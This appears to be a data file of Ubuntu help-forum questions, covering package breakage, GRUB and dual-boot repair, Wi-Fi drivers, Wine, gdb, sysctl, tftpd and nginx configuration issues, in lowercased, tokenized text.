442979	httpconnectionpool ( host='openstack ' , port=35357 ) :	i am getting error when i am trying to access savanna dashboard here is the error from log ... 24690 warning keystoneclient.middleware.auth_token [ - ] retrying on http connection exception : httpconnectionpool ( host='openstack ' , port=35357 ) : max retries exceeded with url : / ( caused by < class 'socket.gaierror ' > : [ errno -2 ] name or service not known ) i have openstack configured at 127.0.0.1:5000 but where/in which file do i change that opsnstack and 35357 ?
442988	trying to install updates and it fails with the following description ubuntu 12.04	installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % dpkg : unrecoverable fatal error , aborting : files list file for package `nitrux-icon-theme ' contains empty filename please help as i am a bit of a newb !
442990	how can i get nullmailer send system alerts to my email address ?	i understand that nullmailer automatically sends some important system error messages using these system configuration files : /etc/nullmailer/adminaddr , /etc/nullmailer/defaultdomain , /etc/nullmailer/me , /etc/nullmailer/remotes but i could n't figure out how i can receive these messages in say my gmail inbox . i 've entered all the settings for sending mails into the file /etc/nullmailer/remotes . however , i could n't get the recipient mail address correct . it seems the problem is that anything i enter into the file /etc/nullmailer/adminaddr is automatically prefixed with `` root @ '' , which results in an `` unknown address '' and the mail being returned to the sender , which serves the purpose any way . but i 'm curious how i can get this configuration fully right . i 'll appreciate some light on this .
442992	how do remove pppoeconf from boot process	i recently upgraded from a bsnl zte adsl modem to a digisol wireless router+modem . when i had my previous modem , i used pppoeconf to set up my connection . now my modem connects itself , and i no more need pppoeconf . as pppoeconf disabled network manager , i could n't use it . then i tried starting the service , sudo service network-manager start and it works perfectly . the only problem is now i have to do this every time i boot , and while booting , the waiting for network configuration message makes me wait three minutes or so . it 's annoying . i want my three minutes back , along with network manager . please help me remove pppoeconf and revert to network manager . thanks
442993	how do i place this file in ubuntu ? ( in parallels / osx )	i need to place a file in the /etc/ directory , and i 'm unable to copy/paste text into vi . since this file is in a parallels ( on osx ) virtual machine , i 'm not sure what my options are .
442997	how can i convert audio from ogg to mp3 ?	i 'm looking for a well working audio converter which is able to convert audio files ( ogg ) to mp3 formate . i tried it with the `` sound converter '' from software center but it stopped converting after 6 of 12 files . can anybody here please help me ?
442998	wi-fi connection problem	i am using a laptop which has n't got any hard drive . but i am using a 13.10 ubuntu which installed in a flash driver so i can bring my ubuntu whereever i want . so i have tried this little 32 gb ubuntu flash driver in so many laptops and connected to internet with wireless connection . but now , i am trying to use this laptop but i can not connect internet with wireless . i think the problem is all about this old laptop , because the light of wireless is always off . but still i have doubt that can we fix that problem and connect internet with wireless method ? hope it was a clear explain : ) .
443002	does running office 2010 through wine add a significant performance overhead ?	say you have have a computer with a data sheet similar to this cpu : 1.1 ghz dual-core intel celeron processor 847 ram : 2gb hdd : 320gb ( 5400 rpm ) according to the minimum requirements in windows platforms this machine would be perfectly able to run excel 2010 : cpu : 500 mhz ram : 256 hdd : 2gb ( source ) but how much would using wine instead of a native windows system impact the performance ? would i still be able to run excel with the configuration above , even when editing tables with thousands and thousands of rows ?
443010	why login is very slow on ubuntu 13.10 32 bits ?	i am using ubuntu 13.10 i386 desktop . after entering password , screen becomes black for more than 10 seconds [ from 10 to 30 seconds ] to load unity . i have deleted all files from home/sagar/ and reboot pc to reset my user account but login delay remains the same .
443011	potential and possible damage of executed windows applications through wine environment in linux ?	related to this recent question : can a windows virus transfer to ubuntu ? and jfa 's comment , which is not only an interesting , but also a valid one : can you also get a windows virus by running an infected .exe in wine ? i was wondering the same . also , how great is the possibility of potential damage , due to execution of malicious code within the executable , while running under wine ? ( i guess that most linux users who also use wine and alike do n't use antivirus protection , but still come across this problem , unnoticed . )
443020	ubuntu gnome facebook login error	i am not able to login into facebook on online accounts of gnome ubuntu 13.10 . always get this message ( shown in screenshot ) your popup is too small to display this page . please enlarge it to proceed . what should i do ?
443021	`` code 126 : permission denied '' when using gdb debugger	i have written a piece of c++ code and am trying to debug that using gdb debugger . the code uses bunch of libraries , so i am using a make-file to compile and link all the required libraries , which i have provided below . the issue is that my code gets successfully compiled and the objects are all created . however , when i run the command gdb main.o , and try gdb commands , e.g. , run , i get the following messages . starting program : /home/soheilmn/my/main.o /bin/bash : /home/soheilmn/my/main.o : permission denied /bin/bash : line 0 : exec : /home/soheilmn/my/main.o : can not execute : permission denied during startup program exited with code 126 . i am sure that i have read/write access in the directory /home/soheilmn/my , so i thought the problem may come from bad installation of gdb . however , i can write a simple c++ code in another directory , say /home/soheilmn/test , and gdb works flawlessly over there . could this problem come from number of libraries that i am using in my c++ code ( considering the fact that my code runs flawlessly after being compiled and linked to all the libraries ) ? thanks in advance , soheil p.s . here is my make-file . system = x86-64_sles10_4.1 libformat = static_pic mydir = /home/soheilmn/my/ cplexdir = /usr/local/ilog/cplex123/cplex concertdir = /usr/local/ilog/cplex123/concert cplexincdir = $ ( cplexdir ) /include concertincdir = $ ( concertdir ) /include cplexlibdir = $ ( cplexdir ) /lib/ $ ( system ) / $ ( libformat ) concertlibdir = $ ( concertdir ) /lib/ $ ( system ) / $ ( libformat ) gsldir = /usr/include/gsl ccc = g++ ccopt = -o -g -fpic -fexceptions -dndebug -dil_std cclnflags = -l $ ( cplexlibdir ) -lilocplex -lcplex -l $ ( concertlibdir ) -lconcert -lm -lpthread -lrt -lgsl -lgslcblas ccflags = $ ( ccopt ) -i $ ( cplexincdir ) -i $ ( concertincdir ) -i $ ( gsldir ) main : main.o $ ( ccc ) $ ( ccflags ) main.o -o main $ ( cclnflags ) main.o : $ ( mydir ) /main.cpp $ ( ccc ) -c $ ( ccflags ) $ ( mydir ) /main.cpp -o main.o
443031	ticking sound from hd	i am using ubuntu since last three months , after switching to ubuntun13.10 i installed tlp for improvement of battery life . but then i remove tlp because there is a ticking sound from my hard disk , but even after removing it my hd is making a noisy sound specially at the time of loading any software or video/audio and when i boot to windows 8.1 then there is no sound like that . how can i solve this problem ?
443032	/etc/sysctl.conf does n't persist after reboot	in a mission to reduce frequent memory flushes to filesystem , i added the following two lines to /etc/syctl.conf . vm.dirty_background_ratio = 50 vm.dirty_ratio = 80 i then ran , sudo sysctl -p and the changes were in effect right way . upon a system reboot , however , i still see old values for dirty_ratio and dirty_background_ratio . new-sys-admin @ thinkpad : ~ $ sysctl -n vm.dirty_background_ratio 10 new-sys-admin @ thinkpad : ~ $ sysctl -n vm.dirty_ratio 5 i 'm running ubuntu 12.04.3 lts 3.2.0-52-generic-pae . after looking at a couple of posts , ubuntu way to run sysctl -p on each boot ? ubuntu 12.04 , why service procps start does n't start procps ? it looks like the upstart job , /etc/init.d/procps is supposed to run on system boot and reload /etc/sysctl.d/* and /etc/sysctl.conf contents via /etc/init/procup.conf but it does n't seem like it does . on the next reboot , i ran service procps start and the changes were in effect . i 'm wondering how to make procps run consistently on boot time and if i am missing an additional step in making these changes persistent . edit 1 also tried having these values in /etc/sysctl.d/10-local.conf as per bill 's suggestion . new-sys-admin @ thinkpad : ~ $ cat /etc/sysctl.d/10-local.conf vm.dirty_background_ratio = 50 vm.dirty_ratio = 80 upon restart , the values are reverted back .
443036	what is the correct output of cat /etc/apt/sources.list	i have ubuntu 12.04 lts and i need the correct output because i edited it because it was n't working but it has only made it worse thank you for your help
443037	how do i turn on workspaces by command	i installed compiz , and messed with a few little things , unfortunately i lost the workspaces switcher i tried gsettings set org.compiz.core : /org/compiz/profiles/unity/plugins/core/ hsize 2 but could n't get it back , tried to go to appearance and clicked on it in the behavior but no change i also looked for a command in terminal , and did n't find any , i am using ubuntu 13.10 is there any way to get it back without formatting my pc ?
443040	tew-664ub wireless adaptor wont connect 12.04 ?	i have tew-664ub wireless adaptor but i dont know how to get connected wirelessly . i have wired connection now . i dont even know where to start . using 12.04
443041	php - notice : undefined variable:	i created header.html file where i want to include php , if i run this code : < ? php for ( $ i ; $ i < 10 ; $ i++ ) echo $ i ; ? > it shows : notice : undefined variable : i in c : \xampp\htdocs\phpbook\header.html on line 3 , but if i run this code , its all good . why ? i dont need to define variables in php . < ? php $ i= '' ; for ( $ i ; $ i < 10 ; $ i++ ) echo $ i ; ? > im using .html extension so i can easily include all css files etc . maybe its not even supose to run with .html extension ?
443044	grub rescue unknown filesystem error due to deletion of partition	i had windows 7 and ubuntu on my system . i decided to remove ubuntu partition so i deleted it from windows device manager and formatted and renamed that partition . now whenever i start my system it gives me this error : error : unknown filesystem grub rescue > `` console . i have tried using ubuntu bootable usb , windows 8/xp bootable cd but nothing works . can anyone tell me how to get back to windows without losing any data ?
443045	wifi does not work ubuntu 12lts lenovo s540	when i was installing ubuntu wifi worked without setting up anything . but once the installation is completed now i can not connect to wifi any more . the drop down says `` not enabled '' for the wifi option ? how can i fix this ? here is what i get in `` ifconfig -a '' eth0 link encap : ethernet hwaddr 20:1a:06 : c3 : xx : xx lo link encap : local loopback wwan0 link encap : ethernet hwaddr 0a:28:1a:75 : aa:78
443048	python 2.7.6 on ubuntu 12.04 how to ?	i 'm developer and i need to make my enviroment work with python 2.7.6 ( not 2.7.3 ) on the ubuntu 12.04 . please , provide me some notes how to do that ?
443050	how do i refresh my wired ethernet connection from command line ?	what is the command line equivalent of unchecking `` enable networking '' ( disabling networking ) and then re-enabling ? in my environment , there are multiple networks which require me to physically move my network cable . sometimes my connection does not refresh properly , so i disable/re-enable networking to refresh my connection . being able to do this from the command line would be much more efficient for me . i 'm using 12.04 lts .
443053	could not initialize sdl : no available video device do n't move	i have downloaded an indie game do n't move from this link . when i try to run it on ubuntu 12.04 , it gives following error messages . could not initialize sdl : no available video device al lib : ( ee ) alc_cleanup : 1 device not closed how do i resolve this ?
443056	how to install grub on installed ubuntu disk ?	i have installed ubuntu , and somehow my grub is not detected because my 1st disk has a bad sector , i have tried using this command : sudo grub-install /dev/sdb1 -- recheck -- force-lba and it did n't work . it prompted a message like : /dev/loop0 does not have any corresponding bios drive . how to install grub on current running partition ?
443057	12.04 -mute microphone key not working under cinnamon	i am runnning ubuntu 12.04 on a lenovo t430 and i recently installed cinnamon 2 . unfortunately the mute microphone button ( which i use a lot on conference calls ) on the keyboard is not working even though it works just fine under unity . i was able to add a keyboard shortcut with the command `` amixer set capture toggle '' which works , but i need it to display a notification that lets me know whether the mute is on or off . can you help me in setting up the notification or to somehow copy what unity does to make it work properly ? thanks a lot
443060	mavericks screen sharing resolution - remmina vnc client	i am remoting into my macbook pro from an ubuntu vnc client ( remmina ) . the screens i have for my ubuntu machine are much lower resolution then my retina display so the vnc session window is enormous . is there any way i can reduce the resolution for remote screen management or perhaps use a client that allows the remote session window in ubuntu to be scaled so i can view the entire retina desktop on a single screen ?
443063	ca n't use 2 networks simultaneously	i ca n't use 2 networks simultaneously in ubuntu , for example : one for internet , and another for accesing local computer in home . for example i need to disconnect my local connection for accecing internet , or disconnect internet connection for accecing local . ip 's , subnet 's and gateway 's of both connections are different . so problem is n't there i think . can anybody help to fix this problem ? thnx
443064	two cursors unbuntu 12.0 on virtualbox	i have two cursors showing on my machine . i have two monitors on my system and for some reason when i also have a two cursors . the second cursor 's vertical position always mimics the first cursor , but its horizontal position is always twice the distance that the first cursor is from the left monitor 's left most edge . any ideas for troubleshooting ?
443069	vlc downmix surround to stereo ?	when i 'm playing a 5.1 movie , i only hear left and right channel . when there 's sound from a rear channel , i hear absolutely nothing . how do i set vlc to convert 5.1 to stereo , so that no sounds are missing ? ps i use pulseaudio .
443070	can not import directory path to qmlscene	i am trying to import directory in qml as explained , here : http : //qt-project.org/doc/qt-5.0/qtqml/qtqml-syntax-directoryimports.html . i have the following ubuntu-app | - extras1 | - extras2 | - myapp | - app1.qml | - app2.qml hence , in app1.qml i wrote import `` ../extras1 '' import `` ../extras2 '' and when i runt it with qmlscene , i got the following error '' ../extras1 '' : no such directory
443074	installing windows 7 after ubuntu on macbookpro 8,2	i have an extremely long troubleshooting narrative , but here are what i believe to be the most crucial features . i own a macbookpro 8,2 . currently running ubuntu exclusively . i attempted to re-partition my hard drive so that i could use mac osx as little as possible and get introduced to linux os 's via ubuntu . i downloaded and installed refit , burned an ubuntu 12.04 lts image to a dvd , and installed ubuntu on the partition that i installed . however , i think i messed up the boot records or something , because it did not boot into refit , and i could not get the ubuntu grubs to give me the option to boot to mac osx . therefore i just said screw it and re-partitioned my hard drive to it 's current state , which i will show below : | bios 1mb | ext 4 ( ubuntu partition ) , 455 gb | swap , 5 mb | ntfs , 295 gb | | /dev/sda1| /dev/sda2 | /dev/sda3 | /dev/sda4 | i really want to install windows to /dev/sda4 , the ntfs formatted partition . i torrented a .iso for windows 7 , but no matter what i can not get my computer to boot to the dvd that i burned of this image . i have tried mashing c , f2 , f1 , esc , and f12 while booting the machine . when i manage to get to any type of boot options screen , it 's the ubuntu grubs where it does not give me the option to boot to the disk . a few questions : what pieces of information do i need to supply myself and the viewers of this page with such that i might correct the problem ? do i need to convert the windows 7 .iso to a .img ( or .dmg ) before i can boot to it in the macbook dvd drive ? i did n't need to for the ubuntu install . would it be possible to re-install mac os x mavericks and try from the beginning again ? i have a lacie hard drive that i had synced with time machine . is there anyway i can use this to simply revert back to how my hard drive was before i messed with anything ? ( yes , i know i should have backed up all of my information more properly before re-partitioning or messing around with a new os ... .. ) thanks , and let me know if i can do anything to make the solution more apparent . -t
443076	uninstalled pyton 2.7 , now i cant log in	i uninstalled python using following command : sudo apt-get remove python2.7 it ended up removing lot of related system files as well . now when ubuntu boots up it prompts me login , but after that it fails . how can i fix this ?
443078	iphone 4 ios 7 songs not staying on phone ubuntu 13.10	i have an iphone 4 running ios 7 ( i will be switching away from apple at next upgrade ) . i can connect to computer , without any `` trust this computer '' loops like many people , because i installed the newest libimobiledevice . i am now trying to sync my music using rhythmbox . rhythm will let me drag/drop music onto the iphone , and even says that the music i 've added is on the phone . but when i eject the iphone the music i thought i added is n't there . if i leave the phone connected to my computer but close and reopen rhythmbox , it shows that the music i hoped to sync is not present . i installed rhythmbox 3.0.1 according to these instructions , but the issue did not go away . has anyone had success with this issue , or an idean about where i should be looking for guidance ( i.e . where the rhythmbox logs might be , to see if there is some silent error ) ?
443079	heavy cpu usage with ltspice on ubuntu 12.04 32 bit	i currently have ltspice iv installed on my ubuntu 12.04 32 bit machine through wine . i have no major problems running the actual software , but the thing that worries me is how much cpu power the application is using ... .i run the `` top '' command in the terminal and it says that the application is 100 % . i use ltspice for long periods of time and do n't really like the idea of the application making my computer work so hard . does anyone know a possible solution to this problem ? i have tried to look for solutions but nothing seems to cover the topic . i have tried to un-install/re-install both wine and ltspice but neither of the two worked . please help !
443080	moving window is slow and tearing after installing nvidia driver	when i installed ubuntu 13.10 , the nouveau driver was on it . everything was fine , windows moved very smoothly with my 144 hz monitor . now i installed the latest driver from xorg-edgers and after that , windows move like it 's 60 hz all over again . i did open nvidia-settings as super user and set the resolution and refresh rate myself , following with clicking apply and saving the xorg conf and rebooting . however that did not fix it either . what might be the solution for this problem ?
443081	new install 12.4 lts no network conncections	i installed 12.4 lts on a dell d520 with broadcom 1390 . no network connection , wired or wireless is recognized . no network is displayed for wired or wireless in network connection box . both wired and wireless network connections worked under windows xp before ubuntu install . i verified ethernet cable connection with another computer . did not do dual install - replaced xp . i found solution for wireless card , but that requires wired connection . how can i make it recognize a network ?
443082	i 'm trying to install mumble but apparently i 'm missing some dependencies	i got the following error message : the following packages have unmet dependencies : mumble-server : depends : libiceutil34 but it is not installable depends : libzeroc-ice34 but it is not installable e : unable to correct problems , you have held broken packages . i honestly have no clue how to solve this problem . i 'm relatively new to linux in general and google provides answers way too complicated for my level of understanding .
443089	installation error while installing windows 8 in ubuntu	i had windows 8 installed on my laptop than i installed clean ubuntu 12.04 on it and now when i try moving back to windows 8 it shows installation error of some device or media drivers missing . so if anybody could help me out over this
443092	failing to download package information	i was wondering if someone can please help me to rectify this problem with my repository failing to download the package software ( it was last updated 200 days ago ) . i am not too techy with ubuntu , although i love to use it and prefer it over all other operating systems . i would appreciate any help . w : failed to fetch http : //ppa.launchpad.net/michaelgruz/canon/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/michaelgruz/canon/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
443098	setting reverted by ubuntu to kubuntu to ubuntu	i installed kubuntu-desktop on ubuntu 13.10 , and have been going back and forth in order to get used to it . i did notice that some of the settings which i 've personalized get reverted everytime that i log out and then back in . for example , using alt-space to switch keyboard layouts gets reverted to the default ctrl-space . is this behaviour normal ? is there something that i can do to stop it ? cheerios .
443099	problem with broken package system	yesterday i found that the code : :blocks 13.12 on my ubuntu 12.04 lts is broken , when i clicked the icon , it reacted nothing , so i tried to reinstall . i tried to use the instructions from codeblocks ' official website to install codeblocks http : //wiki.codeblocks.org/index.php ? title=installing_code : :blocks_nightly_build_on_ubuntu but it failed yuyue @ thinkpad : ~/downloads/debian-stable/amd64 $ sudo dpkg -i *.deb dpkg-deb : error : `amd64.deb ' is not a debian format archive dpkg : error processing amd64.deb ( -- install ) : subprocess dpkg-deb -- control returned error exit status 2 selecting previously unselected package codeblocks . ( reading database ... 299683 files and directories currently installed . ) unpacking codeblocks ( from codeblocks_13.12-1_amd64.deb ) ... preparing to replace codeblocks-common 13.12-1 ( using codeblocks-common_13.12-1_all.deb ) ... unpacking replacement codeblocks-common ... selecting previously unselected package codeblocks-contrib . unpacking codeblocks-contrib ( from codeblocks-contrib_13.12-1_amd64.deb ) ... preparing to replace codeblocks-contrib-common 13.12-1 ( using codeblocks-contrib-common_13.12-1_all.deb ) ... unpacking replacement codeblocks-contrib-common ... selecting previously unselected package codeblocks-contrib-dbg . unpacking codeblocks-contrib-dbg ( from codeblocks-contrib-dbg_13.12-1_amd64.deb ) ... selecting previously unselected package codeblocks-dbg . unpacking codeblocks-dbg ( from codeblocks-dbg_13.12-1_amd64.deb ) ... preparing to replace codeblocks-dev 13.12-1 ( using codeblocks-dev_13.12-1_amd64.deb ) ... unpacking replacement codeblocks-dev ... preparing to replace codeblocks-headers 13.12-1 ( using codeblocks-headers_13.12-1_all.deb ) ... unpacking replacement codeblocks-headers ... preparing to replace codeblocks-libwxcontrib0 13.12-1 ( using codeblocks-libwxcontrib0_13.12-1_amd64.deb ) ... unpacking replacement codeblocks-libwxcontrib0 ... preparing to replace codeblocks-wxcontrib-dev 13.12-1 ( using codeblocks-wxcontrib-dev_13.12-1_amd64.deb ) ... unpacking replacement codeblocks-wxcontrib-dev ... preparing to replace codeblocks-wxcontrib-headers 13.12-1 ( using codeblocks-wxcontrib-headers_13.12-1_all.deb ) ... unpacking replacement codeblocks-wxcontrib-headers ... preparing to replace libcodeblocks0 13.12-1 ( using libcodeblocks0_13.12-1_amd64.deb ) ... unpacking replacement libcodeblocks0 ... preparing to replace libwxsmithlib0 13.12-1 ( using libwxsmithlib0_13.12-1_amd64.deb ) ... unpacking replacement libwxsmithlib0 ... preparing to replace libwxsmithlib0-dev 13.12-1 ( using libwxsmithlib0-dev_13.12-1_amd64.deb ) ... unpacking replacement libwxsmithlib0-dev ... preparing to replace wxsmith-dev 13.12-1 ( using wxsmith-dev_13.12-1_amd64.deb ) ... unpacking replacement wxsmith-dev ... preparing to replace wxsmith-headers 13.12-1 ( using wxsmith-headers_13.12-1_all.deb ) ... unpacking replacement wxsmith-headers ... dpkg : dependency problems prevent configuration of codeblocks : codeblocks depends on libfontconfig1 ( > = 2.9.0 ) ; however : version of libfontconfig1 on system is 2.8.0-3ubuntu9.1 . dpkg : error processing codeblocks ( -- install ) : dependency problems - leaving unconfigured setting up codeblocks-common ( 13.12-1 ) ... dpkg : dependency problems prevent configuration of codeblocks-contrib : codeblocks-contrib depends on libfontconfig1 ( > = 2.9.0 ) ; however : version of libfontconfig1 on system is 2.8.0-3ubuntu9.1 . codeblocks-contrib depends on libgamin0 ; however : package libgamin0 is not installed . codeblocks-contrib depends on codeblocks ( = 13.12-1 ) ; however : package codeblocks is not configured yet . dpkg : error processing codeblocks-contrib ( -- install ) : dependency problems - leaving unconfigured setting up codeblocks-contrib-common ( 13.12-1 ) ... dpkg : dependency problems prevent configuration of codeblocks-contrib-dbg : codeblocks-contrib-dbg depends on codeblocks-contrib ( = 13.12-1 ) ; however : package codeblocks-contrib is not configured yet . dpkg : error processing codeblocks-contrib-dbg ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of codeblocks-dbg : codeblocks-dbg depends on codeblocks ( = 13.12-1 ) ; however : package codeblocks is not configured yet . dpkg : error processing codeblocks-dbg ( -- install ) : dependency problems - leaving unconfigured setting up codeblocks-libwxcontrib0 ( 13.12-1 ) ... setting up codeblocks-wxcontrib-dev ( 13.12-1 ) ... setting up codeblocks-wxcontrib-headers ( 13.12-1 ) ... setting up libcodeblocks0 ( 13.12-1 ) ... setting up libwxsmithlib0 ( 13.12-1 ) ... setting up wxsmith-dev ( 13.12-1 ) ... setting up wxsmith-headers ( 13.12-1 ) ... setting up libwxsmithlib0-dev ( 13.12-1 ) ... setting up codeblocks-dev ( 13.12-1 ) ... setting up codeblocks-headers ( 13.12-1 ) ... processing triggers for shared-mime-info ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : amd64.deb codeblocks codeblocks-contrib codeblocks-contrib-dbg codeblocks-dbg then i tried this sudo add-apt-repository ppa : pasgui/ppa sudo apt-get update sudo apt-get install codeblocks and after this i installed code : :blocks 13.12 successfully , but when i opened it i found that i ca n't build or run any files ( seemed to have problem with plugins ) errors were encountered while processing : codeblocks codeblocks-contrib codeblocks-dbg codeblocks-contrib-dbg e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and then i found my package system was broken ... i do n't have synaptic package manager on my computer , i followed this instruction ( from package system is broken . how to fix it ? ) after you get that error , try sudo apt-get -f install to force an install of the files that did n't get loaded because of the error . then try sudo apt-get update again , sudo apt-get -f install back and forth until only the package that has the error is left . sudo dpkg -- configure -a and clean the cache sudo apt-get clean it looks like that nothing effective was done . i opened ubuntu software center , and it notified me to download something to repair the package system , i did it , and in the end i found my package system is still broken ... is there anyone who have a good idea about what to do next ?
443101	how to disable the sleep button ( fn + f4 ) ?	system76 gazelle notebook ; ubuntu 12.04.4 lts for some reason they 've put the sleep button between the mute and volume down buttons , which makes it much too easy to accidentally put the computer to sleep . i 'd like to either disable the sleep button or change it into a second mute button . per the following post : disable suspend when pressing fn+f4 i tried adding a ' # ' to the beginning of the last line in `` /etc/acpi/sleep.sh '' but that did nothing so i tried deleting the `` /etc/acpi/events/sleepbtn '' file and that also did nothing . why did n't these work and how else can i try to disable sleep / fn + f4 ?
443102	details about hardware requirements for ubuntu touch	i am considering getting a new android tablet and installing ubuntu touch on it . on the ubuntu `` operators and oems '' page , there is a table of the hardware requirements to run ubuntu touch on a tablet . here is the table : entry level consumer high-end ubuntu ubuntu tablet enterprise tablet processor arch . dual-core cortex a15 quad-core a15 or intel x86 memory 2gb preferred 4gb preferred flash storage 8gb minimum 8gb minimum screen size 7-10 inch 10-12 inch multi-touch 4 fingers 4-10 fingers full desktop no yes convergence so , my question is : what is the difference between the `` entry level consumer ubuntu tablet '' and the `` high-end ubuntu enterprise tablet '' and do i care ? and what is this `` full desktop convergence '' feature ?
443103	how do i download virtualbox on lubuntu 13.10 ?	i want to download oracle 's virtualbox on my lubuntu machine . they do n't have any downloads for lubuntu on their website . so how do i download it on lubuntu ?
443104	new video card brings me to terminal	i recently had to replace my video card , and the new one the i had installed takes me straight to terminal when i turn the computer on . i never get to the log in screen and i do n't know the commands at all so i do n't know how to get it to work . if it is not compatible , would n't it not work at all ? i really need help here ... the ubuntu version i have is 12.04 and the video card i had installed is a zotac 210 synergy edition 1gb 64bit ddr3 .
443109	checking if a script is running ?	how can i check if a script ( e.g . a bash script ) is running ( in the background ) using command line‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌ ?
443110	grub triple boot windows 7 , debian , xubuntu	i am trying to `` triple boot '' with windows 7 , debian , and xubuntu 13.10 . i am having trouble getting xubuntu 13.10 to show up in the grub menu , right now only windows and debian show up . i installed xubuntu last , and when i did i chose `` install alongisde the other operating systems '' . the install was successful , but now i ca n't boot . i used boot-repair the recommended way , i am hesitant to do anything crazy because i do n't want to brick the machine . http : //paste.ubuntu.com/7201171/ if it helps , i plan to remove debian , i want to just use xubuntu and windows , but this seemed to be easier . thanks !
443116	ati dual monitor wrong supported resolution in ubuntu 12.04	my second monitor is detected as unknown and does n't support the resolution 1680x1050 like the other one does , and they 're identical . both are connected via separate vga cables . here 's my xrandr -q : screen 0 : minimum 320 x 200 , current 3080 x 1050 , maximum 8192 x 8192 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) crt1 connected 1400x1050+1680+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1400x1050 60.0*+ 1600x1200 60.0 + 1600x900 60.0 1360x1024 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1366x768 59.8 1360x768 60.0 1280x800 59.8 1152x864 60.0 1280x768 59.9 1280x720 60.0 1024x768 60.0 800x600 60.3 720x480 60.0 640x480 59.9 crt2 connected primary 1680x1050+0+0 ( normal left inverted right x axis y axis ) 459mm x 296mm 1680x1050 59.9*+ 1400x1050 59.9 1600x900 59.9 1360x1024 59.9 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1366x768 75.0 59.9 1360x768 75.0 59.9 1280x800 59.8 1152x864 59.9 75.0 1280x768 59.8 1280x720 59.8 1024x768 75.0 70.1 60.0 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 67.0 59.9
443117	how to configure tftpd-hpa to allow upload of new files ?	i have a 52 u rack w/ multiple cisco switches and routers . i also have an ubuntu server w/ kvm installed . i created a vm w/ ubuntu 12.04 installed for use as a tftp server to transport images between it and my networking equipment . i installed tftp-hpa , tftpd-hpa and xinetd on it per various guides on this site and others . after much pain and frustration , i was able to tftp locally on the host and from my windows machine . the thing is i have to create empty files for each file i want to upload to the server under the `` nobody '' user in the /var/lib/tftpboot directory using the following command : sudo -u nobody sh < < < `` cd /var/lib/tftpboot ; touch filename ; chmod 777 filename '' bottom line up front : i want to simply be able to `` tftp put '' any file i want w/out having to use the command above to create a file first . please help me before i start breaking expensive things ! here is my xinetd.d tftp config : service tftp { disable = no socket_type = dgram wait = yes user = root server = /usr/sbin/in.tftpd server_args = -v -s /var/lib/tftpboot }
443121	how to `` show '' the script , not run it.. ?	so basically , i uploaded a script to textuploader , and then used the wget command to download it to my /etc directory . now i am able to run the script by typing : perl ... but , what if i want to see whats actually written in the script.. ? just as plain text ? ? is there any way to achieve this.. ? i am sorry , i am really noob , i 'm just trying to understand it . also , my ubuntu looks like this http : //puu.sh/7v7fa.png . nothing fancy like i see on all your others screenshots .
443122	can not connect to wireless network	changing my gateway mx6448 laptop out from windows xp downloaded ubuntu 13.10 . can not find a way to get my wireless network be detected . i have broadcom bcm4311 wireless but can not find any settings for it in the operating system . the wireless router that i am using is a netgear n300 model # wnr2000 . i am also using a macbook pro and mac pro within the network . what can i do ?
443126	how can i test if my isp is throttling my connection to certain domains ?	is there a tool i can use that would definitively show whether or not certain domains are being throttled by my isp ? maybe there 's a script out there ?
443137	nginx rewrite domain to cdn url	i want to redirect all my media files to maxcdn origin poll , this might be duplicate question but could n't find the way i was looking for . server { listen 80 ; # # listen for ipv4 ; this line is default and implied # listen [ : : ] :80 default ipv6only=on ; # # listen for ipv6 root /var/www/domain/public_html ; index index.html index.php index.htm ; # make site accessible from http : //localhost/ server_name domain.com ; return 301 http : //xxx.yyyy.netdna-cdn.com $ request_uri ; but this config gives me '' this webpage has a redirect loop '' example : if visitor request something like : http : //domain.com/day1.mp3 it needs to redirect to http : //xxx.netdna.com/day1.mp3 i 'll be so thankful if you can post me example config .
443138	ubuntu/window 7 dual boot ... cloning the ubuntu partition to another drive	alright , i have an ubuntu/windows 7 dual boot . windows 7 was installed first and is on a ssd . i installed ubuntu on a separate 500gb hard drive afterwards as a dual boot configuration . i read forums on how to do this and everything works fine ... although , it 's been close to a year since i did this and do n't remember everything . i want to swap that 500gb drive with a 1tb drive to have more space ( i want to sell the 500gb drive to get some cash , else , i 'd just install the 1tb ) . i do have clonezilla on a bootable disk . can i just clone the 500gb drive to the 1tb drive and then swap them ? does anybody know if there are any other steps to this ? will i have to do anything with the mbr or grub files ? will everything reference fine ( i.e . my 500gb drive has 3 drive letters , will the new copy keep those drive letters ) ? i do n't know exactly how everything meshes together to work . i 'm assuming that the boot loader ( ? ) has a way to identify each os and has a reference point to where each one is located , that 's why i want to know if a new drive will somehow alter that reference point . i hope i 'm clear on my question . i am using ubuntu 12.04 lts and w7 home premium 64bit .
